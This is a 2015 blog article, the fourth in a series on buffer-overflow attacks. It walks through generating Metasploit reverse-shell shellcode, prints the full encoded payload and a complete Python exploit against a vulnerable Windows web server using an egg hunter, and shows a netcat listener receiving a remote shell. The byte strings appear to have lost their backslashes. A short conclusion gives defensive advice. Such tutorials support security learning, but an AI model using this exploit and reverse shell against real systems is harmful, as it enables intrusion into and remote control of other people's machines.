22 June 2015

buffer-attacks-

Article 4: Injecting our Malicious Payload

So the story so far. We know we have an application vulnerable to a buffer overflow. We have seen that we can overwrite the EIP and so force a command of our choosing to be run. We have identified which characters can be used in the malicious code we are going to use in this article. We have also set up a mechanism for finding our malicious code in memory by the use of an Egg Hunter. Finally, let’s generate the malicious code, insert it and run it.

Shellcode Generation

Finally, we need to generate our malicious payload and add it to our exploit. We use the Metasploit framework to generate a reverse TCP shell excluding any characters we identified as being problematic. Reverse shells are recommended as these will be successful unless strict egress.

msfpayload windows/shell_reverse_tcp LHOST=192.168.1.30 LPORT=443 R | msfencode -e x86/shikata_ga_nai -b ‘x00x01x02x09x0a’ -t python[*] x86/shikata_ga_nai succeeded with size 351 (iteration=1)buf = “” buf += “xd9xd0xb8xd9x95x2cxe8xd9x74x24xf4x5bx31” buf += “xc9xb1x52x31x43x17x83xc3x04x03x9ax86xce” buf += “x1dxe0x41x8cxdex18x92xf1x57xfdxa3x31x03” buf += “x76x93x81x47xdax18x69x05xcexabx1fx82xe1” buf += “x1cx95xf4xccx9dx86xc5x4fx1exd5x19xafx1f” buf += “x16x6cxaex58x4bx9dxe2x31x07x30x12x35x5d” buf += “x89x99x05x73x89x7exddx72xb8xd1x55x2dx1a” buf += “xd0xbax45x13xcaxdfx60xedx61x2bx1execxa3” buf += “x65xdfx43x8ax49x12x9dxcbx6excdxe8x25x8d” buf += “x70xebxf2xefxaex7exe0x48x24xd8xccx69xe9” buf += “xbfx87x66x46xcbxcfx6ax59x18x64x96xd2x9f” buf += “xaax1exa0xbbx6ex7ax72xa5x37x26xd5xdax27” buf += “x89x8ax7ex2cx24xdexf2x6fx21x13x3fx8fxb1” buf += “x3bx48xfcx83xe4xe2x6axa8x6dx2dx6dxcfx47” buf += “x89xe1x2ex68xeax28xf5x3cxbax42xdcx3cx51” buf += “x92xe1xe8xf6xc2x4dx43xb7xb2x2dx33x5fxd8” buf += “xa1x6cx7fxe3x6bx05xeax1exfcxeax43x21xe2” buf += “x82x91x21x1bxe8x1fxc7x71x1ex76x50xeex87” buf += “xd3x2ax8fx48xcex57x8fxc3xfdxa8x5ex24x8b” buf += “xbax37xc4xc6xe0x9exdbxfcx8cx7dx49x9bx4c” buf += “x0bx72x34x1bx5cx44x4dxc9x70xffxe7xefx88” buf += “x99xc0xabx56x5axcex32x1axe6xf4x24xe2xe7” buf += “xb0x10xbaxb1x6excex7cx68xc1xb8xd6xc7x8b” buf += “x2cxaex2bx0cx2axafx61xfaxd2x1exdcxbbxed” buf += “xafx88x4bx96xcdx28xb3x4dx56x58xfexcfxff” buf += “xf1xa7x9axbdx9fx57x71x81x99xdbx73x7ax5e” buf += “xc3xf6x7fx1ax43xebx0dx33x26x0bxa1x34x63”

 

The Completed Exploit Code

 

#!/bin/python import sockethost = “192.168.1.20” s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, 80))#size: 351 reverse tcp shell buf = “” buf += “xd9xd0xb8xd9x95x2cxe8xd9x74x24xf4x5bx31” buf += “xc9xb1x52x31x43x17x83xc3x04x03x9ax86xce” buf += “x1dxe0x41x8cxdex18x92xf1x57xfdxa3x31x03” buf += “x76x93x81x47xdax18x69x05xcexabx1fx82xe1” buf += “x1cx95xf4xccx9dx86xc5x4fx1exd5x19xafx1f” buf += “x16x6cxaex58x4bx9dxe2x31x07x30x12x35x5d” buf += “x89x99x05x73x89x7exddx72xb8xd1x55x2dx1a” buf += “xd0xbax45x13xcaxdfx60xedx61x2bx1execxa3” buf += “x65xdfx43x8ax49x12x9dxcbx6excdxe8x25x8d” buf += “x70xebxf2xefxaex7exe0x48x24xd8xccx69xe9” buf += “xbfx87x66x46xcbxcfx6ax59x18x64x96xd2x9f” buf += “xaax1exa0xbbx6ex7ax72xa5x37x26xd5xdax27” buf += “x89x8ax7ex2cx24xdexf2x6fx21x13x3fx8fxb1” buf += “x3bx48xfcx83xe4xe2x6axa8x6dx2dx6dxcfx47” buf += “x89xe1x2ex68xeax28xf5x3cxbax42xdcx3cx51” buf += “x92xe1xe8xf6xc2x4dx43xb7xb2x2dx33x5fxd8” buf += “xa1x6cx7fxe3x6bx05xeax1exfcxeax43x21xe2” buf += “x82x91x21x1bxe8x1fxc7x71x1ex76x50xeex87” buf += “xd3x2ax8fx48xcex57x8fxc3xfdxa8x5ex24x8b” buf += “xbax37xc4xc6xe0x9exdbxfcx8cx7dx49x9bx4c” buf += “x0bx72x34x1bx5cx44x4dxc9x70xffxe7xefx88” buf += “x99xc0xabx56x5axcex32x1axe6xf4x24xe2xe7” buf += “xb0x10xbaxb1x6excex7cx68xc1xb8xd6xc7x8b” buf += “x2cxaex2bx0cx2axafx61xfaxd2x1exdcxbbxed” buf += “xafx88x4bx96xcdx28xb3x4dx56x58xfexcfxff” buf += “xf1xa7x9axbdx9fx57x71x81x99xdbx73x7ax5e” buf += “xc3xf6x7fx1ax43xebx0dx33x26x0bxa1x34x63″egghunter = (“x33xD2x66x8cxcbx80xfbx23x75x08x31xdb x53x53x53x53xb3xc0x66x81xcaxffx0fx42x52x80xfbxc0 x74x19x6ax02x58xcdx2ex5ax3cx05x74xeaxb8” “x77x30x30x74” # our egg = w00t “x89xd7xafx75xe5xafx75xe2xffxe7x6ax26x58x31xc9 x89xe2x64xffx13x5ex5axebxdfx90x90”)payload = “GET /” + ” HTTP/1.1rn” payload += “Host: ” + host + “rn”#CALL ESP – libstdc++-6.dll 6fc66d71 payload += “Connection: ” + “x90” * 1689 + “w00tw00t” + buf + “x71x6dxC6x6F” + “x90” * 8 + egghunter + “rnrn” s.send(payload) s.close()

  If we run the code against our vulnerable server, the host then connects back to the attacker’s machine to provide us with a remote shell.

nc -vv -l -p 443 listening on [any] 443 … 192.168.1.20: inverse host lookup failed: Unknown server error : Connection timed out connect to [192.168.1.20] from (UNKNOWN) [192.168.1.20] 50332 Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:Program Files (x86)PMSoftwaresws>

 

Why Didn’t the Protection Mechanisms Prevent This?

Since the compiler based options were not enabled on the webservers binary, they would not take effect. This leaves us with DEP and ASLR. ASLR was trivial to bypass since we simply located a non-ASLR library. In Windows 7, DEP is activated for core system services and for applications on an “Opt in basis” and again did not take effect. In future articles, we can look into these mechanisms in further detail.

Conclusion

This exercise shows how attacks of this nature can be avoided. Remove all unnecessary services like the “Simple Web Server” used in this exploit. Implement good egress rules on your firewall, it won’t stop all exploits but it makes life harder. Enable DEP where you can and be aware of opt-in choices that you need to make. Understanding how an exploit is carried out enables you to defend better against it.

back to all posts